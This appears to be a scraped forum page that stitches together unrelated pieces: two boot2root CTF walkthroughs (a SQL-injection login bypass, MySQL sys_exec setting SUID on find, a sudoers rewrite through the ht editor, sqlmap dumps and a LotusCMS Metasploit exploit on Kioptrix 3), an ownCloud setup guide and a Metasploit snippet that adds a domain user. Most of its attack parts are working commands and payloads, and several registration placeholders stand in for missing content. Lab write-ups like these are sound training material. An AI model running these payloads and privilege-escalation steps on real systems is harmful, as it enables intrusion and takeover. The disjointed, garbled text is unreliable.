| 0 | 0 | ||
You can Download it from
[To see content please register here]
and run install in your VM.Penetration Methodologies
- Network scanning (netdiscover, Nmap)
- Directory brute-force (dirb)
- Login Form SQli
- Spwaning tty shell
- SUID Privilege escalation
- Get root access and capture the flag
Turn on your attacking machine and use the netdiscover command to scan your local network to get target IP.
![[Image: 1.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-5b_h8dzvtCw/W0oUtA-0n3I/AAAAAAAAYDw/Bs3K8qHp9VsuwvTS-BlBcYbAt0clCTY2QCLcBGAs/s1600/1.png?w=687&ssl=1)
So we target at 192.168.1.106 let go for its enumeration and scan open ports and protocols. With help nmap aggressive scan we have observed several open port and service running on it.
![[Image: 2.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-RuvKkoRuU8U/W0oUtX2U7GI/AAAAAAAAYD4/cJVvlj3DwKgaU84G-CT5WlGxdlYlydujQCLcBGAs/s1600/2.png?w=687&ssl=1)
Since port 80 is open so without wasting time we use dirb for directory brute-force attack and enumerated /john as a directory which could give something valuable to us.
dirb
[To see content please register here]
1
dirb
[To see content please register here]
![[Image: 3.1.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-xyYNLCQ7EOQ/W0oUt6ouc4I/AAAAAAAAYD8/HFquCD0IpmUWJAFmKFVjCk0E4gXDOmYhwCEwYBhgL/s1600/3.1.png?w=687&ssl=1)
Consequently, we explored URL
[To see content please register here]
in the web browser and notice john.php file. Awkwardly I didn’t found any treasured from inside this file.![[Image: 3.2.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-ULyTTbecdts/W0oUt6QbsyI/AAAAAAAAYEE/PHqhczzsuq8CJqCfyHIKHDJm9lWmRF2ngCEwYBhgL/s1600/3.2.png?w=687&ssl=1)
Further, I came back to its home page and it was login page as shown below. Here we can try SQL injection for login.
![[Image: 3.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-UtxUhIZhPwY/W0oUt3fM2bI/AAAAAAAAYEA/ni1RHRISWg8e59URdgmc5LT02tk_fwfBACEwYBhgL/s1600/3.png?w=687&ssl=1)
So I simply enter the following and get login successfully.
Username: john
Password: ' or 1=1 #
1
2
Username: john
Password: ' or 1=1 #
![[Image: 4.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-CZJAzxi5RH4/W0oUuf0e5CI/AAAAAAAAYEk/9d4gmNblZzsAaQE7QrNkQGHXjfeXqbxngCEwYBhgL/s1600/4.png?w=687&ssl=1)
And welcomed by following web page which serves actual credential for the user “john”
![[Image: 5.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-h8aLtuLdFdQ/W0oUuj2XJOI/AAAAAAAAYEs/0kVw8zQiHUIiXbkS6FZFMu-X_mlcvjoFwCEwYBhgL/s1600/5.png?w=687&ssl=1)
Since we port 22 is open for ssh and we have enumerated following credential so let’s try to login to access tty shell of victim’s machine and then execute below commands.
Username: john
Password: MyNameIsJohn
echo os.system('/bin/bash')
cd /var/www
1
2
echo os.system('/bin/bash')
cd /var/www
![[Image: 7.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-bzt6yq4DHQI/W0oUu-Bw3uI/AAAAAAAAYEo/uZC-giP_Wy4CFk2AiHrflLRbasDHB9pewCEwYBhgL/s1600/7.png?w=687&ssl=1)
Then view its file and directory list where you will get checklogin.php file; open it for further step.
ls
cat checklogin.php
1
2
ls
cat checklogin.php
![[Image: 8.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/--JLXGxB9JKA/W0oUu6KsqOI/AAAAAAAAYEs/zEu7GwzJDjcaPytfamHAPn46eX7LfAE_gCEwYBhgL/s1600/8.png?w=687&ssl=1)
By reading it we conclude that MySQL user name is root with No password.
Now let try to login into MySQL server with the help of the following command and try to execute some malicious query through it.
mysql -u root -p
SELECT sys_exec('chmod u+s /usr/bin/find');
echo os.system('/bin/bash')
quit
1
2
3
4
mysql -u root -p
SELECT sys_exec('chmod u+s /usr/bin/find');
echo os.system('/bin/bash')
quit
By the mean of MySQL, we are trying to enable SUID bit for find command.
![[Image: 9.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-v02h2zGsvrs/W0oUve8ECZI/AAAAAAAAYEo/YSKVDfnttvUhzJr7rtyTanQt_KDQx-zfQCEwYBhgL/s1600/9.png?w=687&ssl=1)
Now move to the /tmp directory and execute the following command for root access.
cd /tmp
touch raj
find raj -exec "whoami" \;
find raj -exec "/bin/sh" \;
ls
cat congrats .txt
1
2
3
4
5
6
cd /tmp
touch raj
find raj -exec "whoami" \;
find raj -exec "/bin/sh" \;
ls
cat congrats .txt
Yuppieee!!! We finished this task and complete the challenge.
![[Image: 10.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-WrwtbU1OxUg/W0oUtclblmI/AAAAAAAAYEk/bZOqLcMRW5UNMw9ob-gZYI6UpR3uXjQIgCEwYBhgL/s1600/10.png?w=687&ssl=1)
[To see content please register here]
![[Image: 1.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-GZysbqlAwJQ/V5RQYCrIU1I/AAAAAAAAM7M/mJ1BOuJropMX6Ij1F6pL2_cwpUA8QahCwCLcB/s1600/1.png?w=687&ssl=1)
![[Image: 2.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-f69lg2eRkPI/V5RQbMUUelI/AAAAAAAAM7w/25hpH2Ne3jQt8wadS-AMvha0TLRjnYvlwCLcB/s1600/2.png?w=687&ssl=1)
![[Image: 3.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-nNXADZOvXMo/V5RQbCykVgI/AAAAAAAAM70/hK4V7XKIaz8DWJ9VoFUrV22ihM7diMLFgCLcB/s1600/3.png?w=687&ssl=1)
![[Image: 4.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-IUzxDxHJ6yk/V5RQbpkk3VI/AAAAAAAAM74/wJ_2a77UeOIelGySNxxHsoYNlUT2YIlvgCLcB/s1600/4.png?w=687&ssl=1)
[To see content please register here]
![[Image: 5.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-Dd2ZcFSwfxw/V5TBZW1QygI/AAAAAAAAM98/-U77V0eA0C8VlWlHIdW2303BkNMS6M1TACLcB/s1600/5.png?w=687&ssl=1)
Now, open your web browser and type:
localhost:81/ownCloud (assuming the name of the server is ownCloud)
Type in your admin username and admin password then. Do remember this name and password.
![[Image: 6.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-k1u6cu2G_FY/V5TBZt6LvvI/AAAAAAAAM-E/Oqp_5oCYaT0ndJJPO0rDReiK_vR1wiNPgCLcB/s1600/6.png?w=687&ssl=1)
![[Image: 7.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-U_K2A1rBCH0/V5TBZvqeBdI/AAAAAAAAM-A/yKNAZosafHUg1_CTh7RWaOtuFgIHv6wnwCLcB/s1600/7.png?w=687&ssl=1)
![[Image: 8.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-DyAty4Aq_a4/V5TBZ4gwjGI/AAAAAAAAM-I/0M8eJx3-LXIe57efeUMTX10TGg3ypMawQCLcB/s1600/8.png?w=687&ssl=1)
![[Image: 9.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-xDEEocjQlD8/V5TBafX2isI/AAAAAAAAM-M/PDQJC3hU6v47vEZ-62-Enz_RF80477cbACLcB/s1600/9.png?w=687&ssl=1)
Now once the client is created, go to the home page again and click on the upload button.
![[Image: 10.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-8x_4sj1DEvk/V5TBXoSOSPI/AAAAAAAAM9c/L7EBM2L5LDEIaH2pNeLRp6wAdTu3IFSqACLcB/s1600/10.png?w=687&ssl=1)
![[Image: 11.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-U-sfavDlf_g/V5TBXtt4G5I/AAAAAAAAM9g/s1BjTmWJhaImXMIfglfXDgxKUD6pTv1EACLcB/s1600/11.png?w=687&ssl=1)
![[Image: 12.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-8bf90BiNQt0/V5TBXvTno0I/AAAAAAAAM9Y/iP8bqDYfhpUb9cEtAaUCbSEJww6vj45jwCLcB/s1600/12.png?w=687&ssl=1)
Input the IP address of the server followed by the port and directory.
In my case, the ownCloud client types:
[To see content please register here]
1
[To see content please register here]
![[Image: 13.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-jHFq0r7PmRs/V5TBYFtv36I/AAAAAAAAM9k/qOo3zr6llK49hjyVr8s0rm6lJkfNwADGACLcB/s1600/13.png?w=687&ssl=1)
Now, the client inputs his/her username and password and connects to the server.
![[Image: 14.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-5_V7qYA0IGU/V5TBYUIVWHI/AAAAAAAAM9o/1aUl5Ng7taww27weCMGKulKk6KoSmMoEwCLcB/s1600/14.png?w=687&ssl=1)
Here, select the owncloud folder which you will find in user in order to data sync.
![[Image: 15.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-3ShelzPXdmo/V5TBYW2GzDI/AAAAAAAAM9s/5ItS0tb2BD0sQ7X8MbE6orPjIzuIP3lhwCLcB/s1600/15.png?w=687&ssl=1)
Then, click on open ownCloud.
![[Image: 16.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-vhqFacWMtSk/V5TBYl7F1-I/AAAAAAAAM9w/_NOUAvmsYeYT0nGgr34MK27z351SCwt7gCLcB/s1600/16.png?w=687&ssl=1)
The client inputs his username and password again.
![[Image: 17.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-P1DT0bDNbgQ/V5TBY877zYI/AAAAAAAAM90/tInwW7NIPwQ-oJv-1n5658dodGuWicG7QCLcB/s1600/17.png?w=687&ssl=1)
In the activity bar, the user can see the file shared by the admin.
![[Image: 18.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-0nsNHE_IwOA/V5TBZEp-7CI/AAAAAAAAM94/HGHFokb1ZvUd5e__gDTpMivhp_rg4G7hACLcB/s1600/18.png?w=687&ssl=1)
![[Image: 0.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-yNgZvcjzOag/V5Nk6iMp-TI/AAAAAAAAM6Y/alDKbfxDt3MXjgKQFbWBHJFdy1wsTwxuwCLcB/s1600/0.png?w=687&ssl=1)
![[Image: 1.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-fBUlR0NSKRw/V5Nk9dbPedI/AAAAAAAAM6c/Qv6kd3kQLwEmHirjXScD92IQTyqx5JtEACLcB/s1600/1.png?w=687&ssl=1)
![[Image: 2.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-hXTouaDYPuE/V5NlFj5nk_I/AAAAAAAAM6k/UB7yYiryIOY_8ewFOGLl_sEsk4BFQcKbACLcB/s1600/2.png?w=687&ssl=1)
![[Image: 3.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-slo1vsEDBxM/V5Nk_83B3zI/AAAAAAAAM6g/P1MsEPfu4qUo0EAkJsruCdj7qAuS11r7wCLcB/s1600/3.png?w=687&ssl=1)
This module will enumerate Active Directory groups on the specified domain.
msf > use post/windows/gather/enum_ad_groups
msf post(enum_ad_groups) > set session 1
msf post(enum_ad_groups) > exploit
![[Image: 4.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-OymBCz7IR_U/V5NlMyIgRCI/AAAAAAAAM64/RbatDCrTLuI0wJghKfjByWLR_ixgPLruACLcB/s1600/4.png?w=687&ssl=1)
To Add Any User in Active Directory
msf post(add_user_domain) > set addtodomain true
msf post(add_user_domain) > set username hacker
msf post(add_user_domain) > set password abcd@123
msf post(add_user_domain) > set session 1
msf post(add_user_domain) > exploit
![[Image: 6.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-tvlvZc14oIs/V5NlH0FtnaI/AAAAAAAAM6o/OaneEUsnCjUSyck-V0lcKSm9H149EyNVACLcB/s1600/6.png?w=687&ssl=1)
![[Image: 7.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-0QAdebDHfAA/V5NlIGXpUQI/AAAAAAAAM6s/KoMGCJzf8Ook-FrXaEXeixKbgLVt53-IQCLcB/s1600/7.png?w=687&ssl=1)
![[Image: 8.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-7GrDmxIO8Tw/V5NlLVs6bFI/AAAAAAAAM60/-5OnZlYy-q0pHXDLGYzfHZpAxKA1M-DjQCLcB/s1600/8.png?w=687&ssl=1)
![[Image: 9.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-qDp7KCkpJGY/V5NlJwSto3I/AAAAAAAAM6w/QJqUdXYOnLMFFCuT1J3iq2_OYZycxjIsgCLcB/s1600/9.png?w=687&ssl=1)
Hello friends! Today we are going to take another CTF challenge known as Kioptrix: Level1.2 (#3) and it is another boot2root challenge provided for practice and its security level is for the beginners. So let’s try to break through it. But before please note that you can download it from here
[To see content please register here]
Penetrating Methodologies (Method 1)
- Network Scanning (Nmap, netdiscover)
- Surfing HTTP service port (80)
- SQLMAP Scanning
- Extract databases and user credentials
- SSH access to the target with a specific user
- Exploiting target with SUID bit and SUDO binaries
- Get Root access and capture the flag.
- Network Scanning (Nmap, netdiscover)
- Surfing HTTP service port (80)
- Identifying exploit for the vulnerable CMS application
- Exploiting the target via Metasploit
- Get Root access and capture the flag.
Start off with finding the target using :
netdiscover
1
netdiscover
![[Image: 1.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-3yYSdgZeNQw/W1Ar1S8_w9I/AAAAAAAAYV0/KhND3lPyMOgMIbO_qPY9Kb9MiPEUUxq9wCLcBGAs/s1600/1.png?w=687&ssl=1)
Our target is 192.168.1.101 Now scan the target with nmap:
nmap -A 192.168.1.101
1
nmap -A 192.168.1.101
With the nmap scan result, you can see that HTTP services are running on 2 ports i.e ports 22,80
![[Image: 2.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-dvcPh0bkrvU/W1Ar4Ke5fcI/AAAAAAAAYWk/1F09SKVAZn4bKqMC1hcv61Y7d61a09LHACLcBGAs/s1600/2.png?w=687&ssl=1)
As we have HTTP service running we opened it in our browser with the IP
[To see content please register here]
. There is nothing significant on this webpage.![[Image: 3.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-ewPmdKxuNr4/W1Ar4SZGqTI/AAAAAAAAYWs/jZmN60rM2MsUJFQW_ZNbb0p-0hRyHuppwCLcBGAs/s1600/3.png?w=687&ssl=1)
Click on the Blog option and below page will appear. Here we will get a clue to check out the page
[To see content please register here]
1
[To see content please register here]
![[Image: 4.1.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-v87m6CYIxVU/W1Ar4ziwVdI/AAAAAAAAYWw/GkRdtyEcyQokSPp3R6qsGgCsn4emdDyJACLcBGAs/s1600/4.1.png?w=687&ssl=1)
Before navigating to the website, let’s map the host entries for the URL kioptrix3.com to IP 192.168.1.101 in the host’s file as follows :
For Windows C:\windows\system32\drivers\etc\hosts
For Linux: /etc/hosts
![[Image: 4.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-pZxYThRZH7U/W1Ar40xmQnI/AAAAAAAAYW0/JisCeLAK5SwboR8JM_q5JdN3uuRtljvUwCLcBGAs/s1600/4.png?w=687&ssl=1)
Browse to the website
[To see content please register here]
and navigate on a few items![[Image: 5.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-w2Ic1ifntB8/W1Ar5fves3I/AAAAAAAAYW4/eZRCGUBcsAkV4XFdgNOAiv1PIOeCbYk7ACLcBGAs/s1600/5.png?w=687&ssl=1)
After navigating through the site, I found that by clicking on sorting options and photo id, the URL had a parameter of “id” which could signify a vulnerability to SQL injection. After putting ‘ after php?id=1 , i.e (by trying with
[To see content please register here]
’ ) the SQL error prompt appears. Hence this means that URL is prone to SQL injection.![[Image: 6.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-b4VLAvwgC7c/W1Ar5UnUfCI/AAAAAAAAYW8/DnEXHSXVTxIxPggQL_Pgm6qcKsIRRQ_PQCLcBGAs/s1600/6.png?w=687&ssl=1)
Lets’ enumerate the databases with SQLMAP command to get more details
sqlmap -u kioptrix3.com/gallery/gallery.php?id=1 --dbs –batch
1
sqlmap -u kioptrix3.com/gallery/gallery.php?id=1 --dbs –batch
![[Image: 7.1.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-e7WH058qHwY/W1Ar5mSd83I/AAAAAAAAYXA/7QeiSoszplsqVgeRGFrEZmO2qOv45VbmgCLcBGAs/s1600/7.1.png?w=687&ssl=1)
Upon successful completion of the SQLMAP scan, we came to know that the following databases listed are available on the website.
sqlmap -u kioptrix3.com/gallery/gallery.php?id=1 -T dev_accounts --dump
1
sqlmap -u kioptrix3.com/gallery/gallery.php?id=1 -T dev_accounts --dump
Upon further scan for the gallery database and specific table dev_accounts, we happen to find out 2 usernames as listed below
![[Image: 7.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-r7Ad-RKQ498/W1Ar6D_mxuI/AAAAAAAAYXE/YEcnw4-A2tIyfff6gtQWBYB3h-Jq88EvgCLcBGAs/s1600/7.png?w=687&ssl=1)
Perform SSH with the user loneferret as follows:
ssh [email protected]
1
ssh [email protected]
Let’s do the directory listing to find out more details
ls
1
ls
Upon listing, we find that we have 2 files checksec.sh and CompanyPolicy.README. I didn’t find checksec.h file of much help and proceeded to extract the contents of CompanyPolicy.README
cat CompanyPolicy.README
The output of the CompanyPolicy.README file reveals (refer screenshot below), that we may need to perform a sudo for the ht (editor). This may be a clue going forward
![[Image: 8.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-iAGmNanfwbo/W1Ar6GAonDI/AAAAAAAAYXI/CCTC3rquw8wyeOQ9jj7VYl2Wb9IjtSjLACLcBGAs/s1600/8.png?w=687&ssl=1)
At this moment, let’s also check the contents of the sudo file
sudo –l
1
sudo –l
As per the output, the user loneferret is allowed to run HT Editor as sudo and that there is no password (NOPASSWD) set for this user while executing the command /usr/local/bin/ht
Run the HT Editor as sudo
Note: sudo ht will allow editing any file on the system. Hence we will edit the /etc/sudoers file. Before editing the sudoers file make sure to export TERM so we can use graphical component of our command
export TERM=xterm-color
sudo ht /etc/sudoers
1
2
export TERM=xterm-color
sudo ht /etc/sudoers
![[Image: 9.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-TxZSL_H0KNs/W1Ar6cIrGyI/AAAAAAAAYXM/bUXbBvPov20f_F77AAITUH58gbCwdkQcQCLcBGAs/s1600/9.png?w=687&ssl=1)
Once done, the HT editor will open up
![[Image: 10.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-gmddNhIwef4/W1Ar1hGwzOI/AAAAAAAAYV8/gHmpgL3VxsAAy_B8esYM9LNpe4W7q1LOQCLcBGAs/s1600/10.png?w=687&ssl=1)
Press F3 to open the file
![[Image: 11.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-rHGQ-hLBBfY/W1Ar1gwbduI/AAAAAAAAYV4/PjRJ2CFrmskwiN8k0WVOFfEczsq7yLGQwCLcBGAs/s1600/11.png?w=687&ssl=1)
Below is a snippet of /etc/sudoers file. Edit the file so that we can use sudo without limitations.
Refer the below entry in the file
loneferret ALL=NOPASSWD: !/usr/bin/su, /usr/local/bin/ht
1
loneferret ALL=NOPASSWD: !/usr/bin/su, /usr/local/bin/ht
![[Image: 12.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-P7p5CvsBcmo/W1Ar2MYoPgI/AAAAAAAAYWA/Bxnkf_KdGDss2rzIpwjMmaOOsQc-xtuugCLcBGAs/s1600/12.png?w=687&ssl=1)
Now change the entry for the user loneferret as follows
loneferret ALL=(ALL) NOPASSWD: ALL
1
loneferret ALL=(ALL) NOPASSWD: ALL
![[Image: 13.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-glWlYP7REN4/W1Ar2m4OWYI/AAAAAAAAYWE/mK_WbIK7sSgkkuH9OzlFcSucZFqktyXrACLcBGAs/s1600/13.png?w=687&ssl=1)
Upon changing the contents of the file, let’s run sudo su command from the users’ terminal
sudo su
1
sudo su
Hurrah! we have got the ROOT access !!
cd /root
1
cd /root
On performing the directory listing, we will get the congrats.txt file!
ls
1
ls
![[Image: 14.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-wzA_4slk2Kk/W1Ar2lJRq5I/AAAAAAAAYWI/upmpJ39R4p0Ggi33wy4tdMExGsIMWHVnwCLcBGAs/s1600/14.png?w=687&ssl=1)
Method 2
Let’s explore another method of performing the same task
curl –v
[To see content please register here]
1
curl –v
[To see content please register here]
The curl command will provide the details of the website. With this, we also came to know that it is a CMS website as highlighted below in yellow (LotusCMS)
![[Image: 15.1.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-8W-B9lvRbDQ/W1Ar2-XWlxI/AAAAAAAAYWM/4wMOJxngLWUEPVl7ug54Y-o9nm3cdfnwACLcBGAs/s1600/15.1.png?w=687&ssl=1)
Now we will try to search for some exploit available in the Metasploit and fortunately we happen to found the exploit for LotusCMS
searchsploit LotusCMS
To use this exploit simply type the following in Metasploit:
use exploit/multi/http/lcms_php_exec
set rhost 192.168.1.101
set uri /
exploit
1
2
3
4
use exploit/multi/http/lcms_php_exec
set rhost 192.168.1.101
set uri /
exploit
Perform the directory listing and we will observe the gallery folder
ls
1
ls
Now navigate to the gallery folder and perform the directory listing. Here we can see many files.I browsed through many of these files; of which the file gconfig.php seems to be interesting.
cd gallery
ls
1
2
cd gallery
ls
![[Image: 15.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-1VTD94JPOhM/W1Ar3Mgl4sI/AAAAAAAAYWQ/JdznZZTjT8sgNgeEPWj_Reuw8WIVs04iACLcBGAs/s1600/15.png?w=687&ssl=1)
Now let’s see if we can get some good information from the gconfig.php file
cat gconfig.php
1
cat gconfig.php
The output of the file shows the credentials for the gallery database
Username :root
Password : fuckeyou
1
2
Username :root
Password : fuckeyou
![[Image: 16.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-4fePb1Rvo1E/W1Ar3XZfT7I/AAAAAAAAYWU/kAVAHk0c42oLHJD4rXJ1W7ASz2bqlkGqwCLcBGAs/s1600/16.png?w=687&ssl=1)
Let’s perform dirb for the URL
[To see content please register here]
dirb
[To see content please register here]
1
dirb
[To see content please register here]
With this, we will get information from many directories as shown in the output below. However, the directory phpmyadmin seems to be quite interesting, as it may have some important information to display
![[Image: 17.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/--jQJBi_5LAo/W1Ar3oOevbI/AAAAAAAAYWY/X5vRmSZI0vQrStYtTtFMXFaKMDn2o9rGQCLcBGAs/s1600/17.png?w=687&ssl=1)
Browse the URL
[To see content please register here]
and enter the credentials (received from above)![[Image: 18.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-NWLQTkgUU44/W1Ar3-x-t7I/AAAAAAAAYWc/lfbmxXMG5vAB4RSt9I_HDHbxVApzwz3gwCLcBGAs/s1600/18.png?w=687&ssl=1)
Navigate to the gallery database, click on dev_accounts. Then click on the SQL tab and enter the SQL query below. We now have the usernames and password hashes!
![[Image: 19.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-Q6UYR9GmnHo/W1Ar37bm0YI/AAAAAAAAYWg/dZKaPPTCadsYOiGF3MWNmjargn3DUau4wCLcBGAs/s1600/19.png?w=687&ssl=1)
For cracking the password hashes, we used the
[To see content please register here]
site![[Image: 20.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-MnuqSHFN3X8/W1Ar4Xj5RbI/AAAAAAAAYWo/wrhG3c2wxJgzyW-dVryS8imiwMdJx-RfwCLcBGAs/s1600/20.png?w=687&ssl=1)
Hurray! We got the passwords as starwars and Mast3r!













